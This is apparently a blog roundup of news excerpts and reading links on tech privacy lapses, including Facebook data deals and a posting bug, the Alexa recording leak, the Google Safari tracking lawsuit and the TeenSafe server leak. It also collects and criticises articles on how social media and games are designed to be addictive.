According to the Wall Street Journal, which cited court documents, unnamed Facebook officials and other unnamed sources, Facebook made special agreements with certain companies called “whitelists,” which gave them access to extra information about a user’s friends. This includes data such as phone numbers and “friend links,” which measure the degree of closeness between users and their friends.

These deals were made separately from the company’s data-sharing agreements with device manufacturers such as Huawei, which Facebook disclosed earlier this week after a New York Times report on the arrangement.

Source: Facebook gave some companies special access to data on users’ friends

The hits keep coming for Facebook: Web giant made 14m people’s private posts public

about 14 million people were affected by a bug that, for a nine-day span between May 18 and 27, caused profile posts to be set as public by default, allowing any Tom, Dick or Harriet to view the material.

“We recently found a bug that automatically suggested posting publicly when some people were creating their Facebook posts. We have fixed this issue and starting today we are letting everyone affected know and asking them to review any posts they made during that time,” Facebook chief privacy officer Erin Egan said in a statement to The Register.

Source: The hits keep coming for Facebook: Web giant made 14m people’s private posts public • The Register

How programmers addict you to social media, games and your mobile phone

If you look at the current climate, the largest companies are the ones that hook you into their channel, whether it is a game, a website, shopping or social media. Quite a lot of research has been done in to how much time we spend watching TV and looking at our mobiles, showing differing numbers, all of which are surprisingly high. The New York Post says Americans check their phones 80 times per day, The Daily Mail says 110 times, Inc has a study from Qualtrics and Accel with 150 times and Business Insider has people touching their phones 2617 times per day.

This is nurtured behaviour and there is quite a bit of study on how they do this exactly

Social Networking Sites and Addiction: Ten Lessons Learned (academic paper)
Online social networking sites (SNSs) have gained increasing popularity in the last decade, with individuals engaging in SNSs to connect with others who share similar interests. The perceived need to be online may result in compulsive use of SNSs, which in extreme cases may result in symptoms and consequences traditionally associated with substance-related addictions. In order to present new insights into online social networking and addiction, in this paper, 10 lessons learned concerning online social networking sites and addiction based on the insights derived from recent empirical research will be presented. These are: (i) social networking and social media use are not the same; (ii) social networking is eclectic; (iii) social networking is a way of being; (iv) individuals can become addicted to using social networking sites; (v) Facebook addiction is only one example of SNS addiction; (vi) fear of missing out (FOMO) may be part of SNS addiction; (vii) smartphone addiction may be part of SNS addiction; (viii) nomophobia may be part of SNS addiction; (ix) there are sociodemographic differences in SNS addiction; and (x) there are methodological problems with research to date. These are discussed in turn. Recommendations for research and clinical applications are provided.

Hooked: How to Build Habit-Forming Products (Book)
Why do some products capture widespread attention while others flop? What makes us engage with certain products out of sheer habit? Is there a pattern underlying how technologies hook us?

Nir Eyal answers these questions (and many more) by explaining the Hook Model—a four-step process embedded into the products of many successful companies to subtly encourage customer behavior. Through consecutive “hook cycles,” these products reach their ultimate goal of bringing users back again and again without depending on costly advertising or aggressive messaging.

7 Ways Facebook Keeps You Addicted (and how to apply the lessons to your products) (article)

One of the key reasons for why it is so addictive is “operant conditioning”. It is based upon the scientific principle of variable rewards, discovered by B. F. Skinner (an early exponent of the school of behaviourism) in the 1930’s when performing experiments with rats.

The secret?

Not rewarding all actions but only randomly.

Most of our emails are boring business emails and occasionally we find an enticing email that keeps us coming back for more. That’s variable reward.

That’s one way Facebook creates addiction

The Secret Ways Social Media Is Built for Addiction

On February 9, 2009, Facebook introduced the Like button. Initially, the button was an innocent thing. It had nothing to do with hijacking the social reward systems of a user’s brain.

“The main intention I had was to make positivity the path of least resistance,” explains Justin Rosenstein, one of the four Facebook designers behind the button. “And I think it succeeded in its goals, but it also created large unintended negative side effects. In a way, it was too successful.”

Today, most of us reach for Snapchat, Instagram, Facebook, or Twitter with one vague hope in mind: maybe someone liked my stuff. And it’s this craving for validation, experienced by billions around the globe, that’s currently pushing platform engagement in ways that in 2009 were unimaginable. But more than that, it’s driving profits to levels that were previously impossible.

“The attention economy” is a relatively new term. It describes the supply and demand of a person’s attention, which is the commodity traded on the internet. The business model is simple: the more attention a platform can pull, the more effective its advertising space becomes, allowing it to charge advertisers more.

Behavioral Game Design (article)

Every computer game is designed around the same central element: the player. While the hardware and software for games may change, the psychology underlying how players learn and react to the game is a constant. The study of the mind has actually come up with quite a few findings that can inform game design, but most of these have been published in scientific journals and other esoteric formats inaccessible to designers. Ironically, many of these discoveries used simple computer games as tools to explore how people learn and act under different conditions.

The techniques that I’ll discuss in this article generally fall under the heading of behavioral psychology. Best known for the work done on animals in the field, behavioral psychology focuses on experiments and observable actions. One hallmark of behavioral research is that most of the major experimental discoveries are species-independent and can be found in anything from birds to fish to humans. What behavioral psychologists look for (and what will be our focus here) are general “rules” for learning and for how minds respond to their environment. Because of the species- and context-free nature of these rules, they can easily be applied to novel domains such as computer game design. Unlike game theory, which stresses how a player should react to a situation, this article will focus on how they really do react to certain stereotypical conditions.

What is being offered here is not a blueprint for perfect games, it is a primer to some of the basic ways people react to different patterns of rewards. Every computer game is implicitly asking its players to react in certain ways. Psychology can offer a framework and a vocabulary for understanding what we are already telling our players.

5 Creepy Ways Video Games Are Trying to Get You Addicted (article)

The Slot Machine in Your Pocket (brilliant article!)

When we get sucked into our smartphones or distracted, we think it’s just an accident and our responsibility. But it’s not. It’s also because smartphones and apps hijack our innate psychological biases and vulnerabilities.

I learned about our minds’ vulnerabilities when I was a magician. Magicians start by looking for blind spots, vulnerabilities and biases of people’s minds, so they can influence what people do without them even realizing it. Once you know how to push people’s buttons, you can play them like a piano. And this is exactly what technology does to your mind. App designers play your psychological vulnerabilities in the race to grab your attention.

I want to show you how they do it, and offer hope that we have an opportunity to demand a different future from technology companies.

If you’re an app, how do you keep people hooked? Turn yourself into a slot machine.

There is also a backlash to this movement.

How Technology is Hijacking Your Mind — from a Magician and Google Design Ethicist

I’m an expert on how technology hijacks our psychological vulnerabilities. That’s why I spent the last three years as a Design Ethicist at Google caring about how to design things in a way that defends a billion people’s minds from getting hijacked.

Humantech.com

Technology is hijacking our minds and society.

Our world-class team of deeply concerned former tech insiders and CEOs intimately understands the culture, business incentives, design techniques, and organizational structures driving how technology hijacks our minds.

Since 2013, we’ve raised awareness of the problem within tech companies and for millions of people through broad media attention, convened top industry executives, and advised political leaders. Building on this start, we are advancing thoughtful solutions to change the system.

Why is this problem so urgent?

Technology that tears apart our common reality and truth, constantly shreds our attention, or causes us to feel isolated makes it impossible to solve the world’s other pressing problems like climate change, poverty, and polarization.

No one wants technology like that. Which means we’re all actually on the same team: Team Humanity, to realign technology with humanity’s best interests.

What is Time Well Spent (Part I): Design Distinctions

With Time Well Spent, we want technology that cares about helping us spend our time, and our lives, well – not seducing us into the most screen time, always-on interruptions or distractions.

So, people ask, “Are you saying that you know how people should spend their time?” Of course not. Let’s first establish what Time Well Spent isn’t:

It is not a universal, normative view of how people should spend their time
It is not saying that screen time is bad, or that we should turn it all off.
It is not saying that specific categories of apps (like social media or games) are bad.

You know that silly fear about Alexa recording everything and leaking it online? It just happened

It’s time to break out your “Alexa, I Told You So” banners – because a Portland, Oregon, couple received a phone call from one of the husband’s employees earlier this month, telling them she had just received a recording of them talking privately in their home.

“Unplug your Alexa devices right now,” the staffer told the couple, who did not wish to be fully identified, “you’re being hacked.”

At first the couple thought it might be a hoax call. However, the employee – over a hundred miles away in Seattle – confirmed the leak by revealing the pair had just been talking about their hardwood floors.

The recording had been sent from the couple’s Alexa-powered Amazon Echo to the employee’s phone, who is in the husband’s contacts list, and she forwarded the audio to the wife, Danielle, who was amazed to hear herself talking about their floors. Suffice to say, this episode was unexpected. The couple had not instructed Alexa to spill a copy of their conversation to someone else.

[…]

According to Danielle, Amazon confirmed that it was the voice-activated digital assistant that had recorded and sent the file to a virtual stranger, and apologized profusely, but gave no explanation for how it may have happened.

“They said ‘our engineers went through your logs, and they saw exactly what you told us, they saw exactly what you said happened, and we’re sorry.’ He apologized like 15 times in a matter of 30 minutes and he said we really appreciate you bringing this to our attention, this is something we need to fix!”

She said she’d asked for a refund for all their Alexa devices – something the company has so far demurred from agreeing to.

Alexa, what happened? Sorry, I can’t respond to that right now

We asked Amazon for an explanation, and today the US giant responded confirming its software screwed up:

Amazon takes privacy very seriously. We investigated what happened and determined this was an extremely rare occurrence. We are taking steps to avoid this from happening in the future.

For this to happen, something has gone very seriously wrong with the Alexa device’s programming.

The machines are designed to constantly listen out for the “Alexa” wake word, filling a one-second audio buffer from its microphone at all times in anticipation of a command. When the wake word is detected in the buffer, it records what is said until there is a gap in the conversation, and sends the audio to Amazon’s cloud system to transcribe, figure out what needs to be done, and respond to it.

[…]

A spokesperson for Amazon has been in touch with more details on what happened during the Alexa Echo blunder, at least from their point of view. We’re told the device misheard its wake-up word while overhearing the couple’s private chat, started processing talk of wood floorings as commands, and it all went downhill from there. Here is Amazon’s explanation:

The Echo woke up due to a word in background conversation sounding like “Alexa.” Then, the subsequent conversation was heard as a “send message” request. At which point, Alexa said out loud “To whom?” At which point, the background conversation was interpreted as a name in the customers contact list. Alexa then asked out loud, “[contact name], right?” Alexa then interpreted background conversation as “right.” As unlikely as this string of events is, we are evaluating options to make this case even less likely.

Source: You know that silly fear about Alexa recording everything and leaking it online? It just happened • The Register

Google sued for ‘clandestine tracking’ of 4.4m UK iPhone users’ browsing data

Google is being sued in the high court for as much as £3.2bn for the alleged “clandestine tracking and collation” of personal information from 4.4 million iPhone users in the UK.

The collective action is being led by former Which? director Richard Lloyd over claims Google bypassed the privacy settings of Apple’s Safari browser on iPhones between August 2011 and February 2012 in order to divide people into categories for advertisers.

At the opening of an expected two-day hearing in London on Monday, lawyers for Lloyd’s campaign group Google You Owe Us told the court information collected by Google included race, physical and mental heath, political leanings, sexuality, social class, financial, shopping habits and location data.

Hugh Tomlinson QC, representing Lloyd, said information was then “aggregated” and users were put into groups such as “football lovers” or “current affairs enthusiasts” for the targeting of advertising.

Tomlinson said the data was gathered through “clandestine tracking and collation” of browsing on the iPhone, known as the “Safari Workaround” – an activity he said was exposed by a PhD researcher in 2012. Tomlinson said Google has already paid $39.5m to settle claims in the US relating to the practice. Google was fined $22.5m for the practice by the US Federal Trade Commission in 2012 and forced to pay $17m to 37 US states.

Speaking ahead of the hearing, Lloyd said: “I believe that what Google did was quite simply against the law.

“Their actions have affected millions in England and Wales and we’ll be asking the judge to ensure they are held to account in our courts.”

The campaign group hopes to win at least £1bn in compensation for an estimated 4.4 million iPhone users. Court filings show Google You Owe Us could be seeking as much as £3.2bn, meaning claimants could receive £750 per individual if successful.

Google contends the type of “representative action” being brought against it by Lloyd is unsuitable and should not go ahead. The company’s lawyers said there is no suggestion the Safari Workaround resulted in any information being disclosed to third parties.

Source: Google sued for ‘clandestine tracking’ of 4.4m UK iPhone users’ browsing data | Technology | The Guardian

Note: Google does not contest the Safari Workaround though

Teensafe spying app leaked thousands of user passwords

At least one server used by an app for parents to monitor their teenagers’ phone activity has leaked tens of thousands of accounts of both parents and children.

The mobile app, TeenSafe, bills itself as a “secure” monitoring app for iOS and Android, which lets parents view their child’s text messages and location, monitor who they’re calling and when, access their web browsing history, and find out which apps they have installed.

Although teen monitoring apps are controversial and privacy-invasive, the company says it doesn’t require parents to obtain the consent of their children.

But the Los Angeles, Calif.-based company left its servers, hosted on Amazon’s cloud, unprotected and accessible by anyone without a password.

Source: Teen phone monitoring app leaked thousands of user passwords | ZDNet

Which basically means that other than nasty parents spying in on their children, anyone else was doing so also.